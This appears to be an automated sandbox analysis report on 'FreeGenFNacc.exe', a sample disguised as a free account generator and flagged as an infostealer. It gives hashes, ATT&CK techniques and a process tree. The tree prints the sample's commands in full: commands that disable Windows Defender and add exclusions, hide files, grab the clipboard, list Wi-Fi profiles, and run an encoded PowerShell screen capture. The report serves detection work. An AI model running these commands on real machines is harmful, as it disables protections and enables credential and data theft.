0bae3b4f3aff820ffc728fe8649039b577bb9aa0f6a8afb5da54c4739b258518

Analysis

max time kernel
141s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-01-2025 16:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FreeGenFNacc.exe
Size

13.9MB
MD5

1c1bd68b07c75975bacef9d407fd9031
SHA1

ce44c004c571ec8e2ae8f0e5bf8429cc4a15f3b8
SHA256

0bae3b4f3aff820ffc728fe8649039b577bb9aa0f6a8afb5da54c4739b258518
SHA512

4b6a368fce8aa9d02107470c646f74d0b41b7214d56de2a12b931314c81ea22a6be577da82660b7864eff54f78fc6bdcbe430d2477599ff06f22b0b0f22b5508
SSDEEP

393216:9Q+IdCylyglJfn/IxU6/y2cCMQbDhZdhe:mqylB/nwF/APaQ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4328	powershell.exe
3788	powershell.exe
1408	powershell.exe
4524	powershell.exe
1872	powershell.exe
1076	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	FreeGenFNacc.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3684	cmd.exe
2988	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2572	bound.exe
3440	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe
812	FreeGenFNacc.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3164	tasklist.exe
2480	tasklist.exe
3056	tasklist.exe
704	tasklist.exe
3984	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4508	cmd.exe

UPX packed file 47 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cc3-22.dat	upx
behavioral2/memory/812-26-0x00007FF815190000-0x00007FF815779000-memory.dmp	upx
behavioral2/memory/812-31-0x00007FF828C10000-0x00007FF828C34000-memory.dmp	upx
behavioral2/files/0x0007000000023cb5-29.dat	upx
behavioral2/files/0x0007000000023cc1-30.dat	upx
behavioral2/memory/812-33-0x00007FF82D610000-0x00007FF82D61F000-memory.dmp	upx
behavioral2/files/0x0007000000023cbc-50.dat	upx
behavioral2/files/0x0007000000023cbb-49.dat	upx
behavioral2/files/0x0007000000023cba-48.dat	upx
behavioral2/files/0x0007000000023cb9-47.dat	upx
behavioral2/files/0x0007000000023cb8-46.dat	upx
behavioral2/files/0x0007000000023cb7-45.dat	upx
behavioral2/files/0x0007000000023cb6-44.dat	upx
behavioral2/files/0x0007000000023cb4-43.dat	upx
behavioral2/files/0x0007000000023cc8-42.dat	upx
behavioral2/files/0x0007000000023cc7-41.dat	upx
behavioral2/files/0x0007000000023cc6-40.dat	upx
behavioral2/files/0x0007000000023cc2-37.dat	upx
behavioral2/files/0x0007000000023cc0-36.dat	upx
behavioral2/memory/812-56-0x00007FF823E70000-0x00007FF823E9D000-memory.dmp	upx
behavioral2/memory/812-58-0x00007FF827A40000-0x00007FF827A59000-memory.dmp	upx
behavioral2/memory/812-60-0x00007FF823D80000-0x00007FF823DA3000-memory.dmp	upx
behavioral2/memory/812-62-0x00007FF8234B0000-0x00007FF823620000-memory.dmp	upx
behavioral2/memory/812-66-0x00007FF827C10000-0x00007FF827C1D000-memory.dmp	upx
behavioral2/memory/812-64-0x00007FF823C40000-0x00007FF823C59000-memory.dmp	upx
behavioral2/memory/812-68-0x00007FF823C10000-0x00007FF823C3E000-memory.dmp	upx
behavioral2/memory/812-72-0x00007FF815190000-0x00007FF815779000-memory.dmp	upx
behavioral2/memory/812-76-0x00007FF828C10000-0x00007FF828C34000-memory.dmp	upx
behavioral2/memory/812-75-0x00007FF814C20000-0x00007FF814F95000-memory.dmp	upx
behavioral2/memory/812-73-0x00007FF823270000-0x00007FF823328000-memory.dmp	upx
behavioral2/memory/812-78-0x00007FF82D610000-0x00007FF82D61F000-memory.dmp	upx
behavioral2/memory/812-82-0x00007FF823D50000-0x00007FF823D5D000-memory.dmp	upx
behavioral2/memory/812-81-0x00007FF823E70000-0x00007FF823E9D000-memory.dmp	upx
behavioral2/memory/812-79-0x00007FF823A50000-0x00007FF823A64000-memory.dmp	upx
behavioral2/memory/812-86-0x00007FF823010000-0x00007FF82312C000-memory.dmp	upx
behavioral2/memory/812-85-0x00007FF827A40000-0x00007FF827A59000-memory.dmp	upx
behavioral2/memory/812-125-0x00007FF823D80000-0x00007FF823DA3000-memory.dmp	upx
behavioral2/memory/812-138-0x00007FF8234B0000-0x00007FF823620000-memory.dmp	upx
behavioral2/memory/812-214-0x00007FF823C40000-0x00007FF823C59000-memory.dmp	upx
behavioral2/memory/812-285-0x00007FF827C10000-0x00007FF827C1D000-memory.dmp	upx
behavioral2/memory/812-297-0x00007FF823C10000-0x00007FF823C3E000-memory.dmp	upx
behavioral2/memory/812-309-0x00007FF823270000-0x00007FF823328000-memory.dmp	upx
behavioral2/memory/812-312-0x00007FF814C20000-0x00007FF814F95000-memory.dmp	upx
behavioral2/memory/812-339-0x00007FF8234B0000-0x00007FF823620000-memory.dmp	upx
behavioral2/memory/812-334-0x00007FF828C10000-0x00007FF828C34000-memory.dmp	upx
behavioral2/memory/812-333-0x00007FF815190000-0x00007FF815779000-memory.dmp	upx
behavioral2/memory/812-348-0x00007FF815190000-0x00007FF815779000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1176	cmd.exe
4756	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4632	WMIC.exe
5100	WMIC.exe
704	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3028	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
1872	powershell.exe
4328	powershell.exe
4328	powershell.exe
1076	powershell.exe
1076	powershell.exe
1872	powershell.exe
4524	powershell.exe
4524	powershell.exe
2988	powershell.exe
2988	powershell.exe
2988	powershell.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe
3788	powershell.exe
3788	powershell.exe
2232	powershell.exe
2232	powershell.exe
1408	powershell.exe
1408	powershell.exe
920	powershell.exe
920	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeIncreaseQuotaPrivilege	4828	WMIC.exe
Token: SeSecurityPrivilege	4828	WMIC.exe
Token: SeTakeOwnershipPrivilege	4828	WMIC.exe
Token: SeLoadDriverPrivilege	4828	WMIC.exe
Token: SeSystemProfilePrivilege	4828	WMIC.exe
Token: SeSystemtimePrivilege	4828	WMIC.exe
Token: SeProfSingleProcessPrivilege	4828	WMIC.exe
Token: SeIncBasePriorityPrivilege	4828	WMIC.exe
Token: SeCreatePagefilePrivilege	4828	WMIC.exe
Token: SeBackupPrivilege	4828	WMIC.exe
Token: SeRestorePrivilege	4828	WMIC.exe
Token: SeShutdownPrivilege	4828	WMIC.exe
Token: SeDebugPrivilege	4828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4828	WMIC.exe
Token: SeRemoteShutdownPrivilege	4828	WMIC.exe
Token: SeUndockPrivilege	4828	WMIC.exe
Token: SeManageVolumePrivilege	4828	WMIC.exe
Token: 33	4828	WMIC.exe
Token: 34	4828	WMIC.exe
Token: 35	4828	WMIC.exe
Token: 36	4828	WMIC.exe
Token: SeDebugPrivilege	2480	tasklist.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeIncreaseQuotaPrivilege	4828	WMIC.exe
Token: SeSecurityPrivilege	4828	WMIC.exe
Token: SeTakeOwnershipPrivilege	4828	WMIC.exe
Token: SeLoadDriverPrivilege	4828	WMIC.exe
Token: SeSystemProfilePrivilege	4828	WMIC.exe
Token: SeSystemtimePrivilege	4828	WMIC.exe
Token: SeProfSingleProcessPrivilege	4828	WMIC.exe
Token: SeIncBasePriorityPrivilege	4828	WMIC.exe
Token: SeCreatePagefilePrivilege	4828	WMIC.exe
Token: SeBackupPrivilege	4828	WMIC.exe
Token: SeRestorePrivilege	4828	WMIC.exe
Token: SeShutdownPrivilege	4828	WMIC.exe
Token: SeDebugPrivilege	4828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4828	WMIC.exe
Token: SeRemoteShutdownPrivilege	4828	WMIC.exe
Token: SeUndockPrivilege	4828	WMIC.exe
Token: SeManageVolumePrivilege	4828	WMIC.exe
Token: 33	4828	WMIC.exe
Token: 34	4828	WMIC.exe
Token: 35	4828	WMIC.exe
Token: 36	4828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4632	WMIC.exe
Token: SeSecurityPrivilege	4632	WMIC.exe
Token: SeTakeOwnershipPrivilege	4632	WMIC.exe
Token: SeLoadDriverPrivilege	4632	WMIC.exe
Token: SeSystemProfilePrivilege	4632	WMIC.exe
Token: SeSystemtimePrivilege	4632	WMIC.exe
Token: SeProfSingleProcessPrivilege	4632	WMIC.exe
Token: SeIncBasePriorityPrivilege	4632	WMIC.exe
Token: SeCreatePagefilePrivilege	4632	WMIC.exe
Token: SeBackupPrivilege	4632	WMIC.exe
Token: SeRestorePrivilege	4632	WMIC.exe
Token: SeShutdownPrivilege	4632	WMIC.exe
Token: SeDebugPrivilege	4632	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4632	WMIC.exe
Token: SeRemoteShutdownPrivilege	4632	WMIC.exe
Token: SeUndockPrivilege	4632	WMIC.exe
Token: SeManageVolumePrivilege	4632	WMIC.exe
Token: 33	4632	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3824 wrote to memory of 812	3824	FreeGenFNacc.exe	82
PID 3824 wrote to memory of 812	3824	FreeGenFNacc.exe	82
PID 812 wrote to memory of 3412	812	FreeGenFNacc.exe	83
PID 812 wrote to memory of 3412	812	FreeGenFNacc.exe	83
PID 812 wrote to memory of 1392	812	FreeGenFNacc.exe	84
PID 812 wrote to memory of 1392	812	FreeGenFNacc.exe	84
PID 812 wrote to memory of 2148	812	FreeGenFNacc.exe	87
PID 812 wrote to memory of 2148	812	FreeGenFNacc.exe	87
PID 812 wrote to memory of 4024	812	FreeGenFNacc.exe	88
PID 812 wrote to memory of 4024	812	FreeGenFNacc.exe	88
PID 812 wrote to memory of 116	812	FreeGenFNacc.exe	91
PID 812 wrote to memory of 116	812	FreeGenFNacc.exe	91
PID 812 wrote to memory of 3236	812	FreeGenFNacc.exe	93
PID 812 wrote to memory of 3236	812	FreeGenFNacc.exe	93
PID 3412 wrote to memory of 1872	3412	cmd.exe	95
PID 3412 wrote to memory of 1872	3412	cmd.exe	95
PID 1392 wrote to memory of 4328	1392	cmd.exe	96
PID 1392 wrote to memory of 4328	1392	cmd.exe	96
PID 3236 wrote to memory of 4828	3236	cmd.exe	97
PID 3236 wrote to memory of 4828	3236	cmd.exe	97
PID 116 wrote to memory of 2480	116	cmd.exe	98
PID 116 wrote to memory of 2480	116	cmd.exe	98
PID 2148 wrote to memory of 1076	2148	cmd.exe	100
PID 2148 wrote to memory of 1076	2148	cmd.exe	100
PID 4024 wrote to memory of 2572	4024	cmd.exe	99
PID 4024 wrote to memory of 2572	4024	cmd.exe	99
PID 812 wrote to memory of 1600	812	FreeGenFNacc.exe	102
PID 812 wrote to memory of 1600	812	FreeGenFNacc.exe	102
PID 1600 wrote to memory of 3460	1600	cmd.exe	104
PID 1600 wrote to memory of 3460	1600	cmd.exe	104
PID 812 wrote to memory of 4536	812	FreeGenFNacc.exe	105
PID 812 wrote to memory of 4536	812	FreeGenFNacc.exe	105
PID 4536 wrote to memory of 1624	4536	cmd.exe	107
PID 4536 wrote to memory of 1624	4536	cmd.exe	107
PID 812 wrote to memory of 456	812	FreeGenFNacc.exe	108
PID 812 wrote to memory of 456	812	FreeGenFNacc.exe	108
PID 456 wrote to memory of 4632	456	cmd.exe	110
PID 456 wrote to memory of 4632	456	cmd.exe	110
PID 812 wrote to memory of 4716	812	FreeGenFNacc.exe	111
PID 812 wrote to memory of 4716	812	FreeGenFNacc.exe	111
PID 4716 wrote to memory of 5100	4716	cmd.exe	157
PID 4716 wrote to memory of 5100	4716	cmd.exe	157
PID 812 wrote to memory of 4508	812	FreeGenFNacc.exe	114
PID 812 wrote to memory of 4508	812	FreeGenFNacc.exe	114
PID 812 wrote to memory of 4136	812	FreeGenFNacc.exe	116
PID 812 wrote to memory of 4136	812	FreeGenFNacc.exe	116
PID 4508 wrote to memory of 4608	4508	cmd.exe	162
PID 4508 wrote to memory of 4608	4508	cmd.exe	162
PID 4136 wrote to memory of 4524	4136	cmd.exe	119
PID 4136 wrote to memory of 4524	4136	cmd.exe	119
PID 812 wrote to memory of 4344	812	FreeGenFNacc.exe	120
PID 812 wrote to memory of 4344	812	FreeGenFNacc.exe	120
PID 812 wrote to memory of 3852	812	FreeGenFNacc.exe	121
PID 812 wrote to memory of 3852	812	FreeGenFNacc.exe	121
PID 3852 wrote to memory of 3056	3852	cmd.exe	124
PID 3852 wrote to memory of 3056	3852	cmd.exe	124
PID 4344 wrote to memory of 704	4344	cmd.exe	125
PID 4344 wrote to memory of 704	4344	cmd.exe	125
PID 812 wrote to memory of 3788	812	FreeGenFNacc.exe	178
PID 812 wrote to memory of 3788	812	FreeGenFNacc.exe	178
PID 812 wrote to memory of 3684	812	FreeGenFNacc.exe	127
PID 812 wrote to memory of 3684	812	FreeGenFNacc.exe	127
PID 812 wrote to memory of 4544	812	FreeGenFNacc.exe	129
PID 812 wrote to memory of 4544	812	FreeGenFNacc.exe	129

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4608	attrib.exe
2524	attrib.exe
1456	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe
"C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3824
- C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe
  "C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:116
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4536
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"
      4⤵
      Views/modifies file attributes
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4344
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3788
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4544
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1460
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1176
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1604
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3068
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIA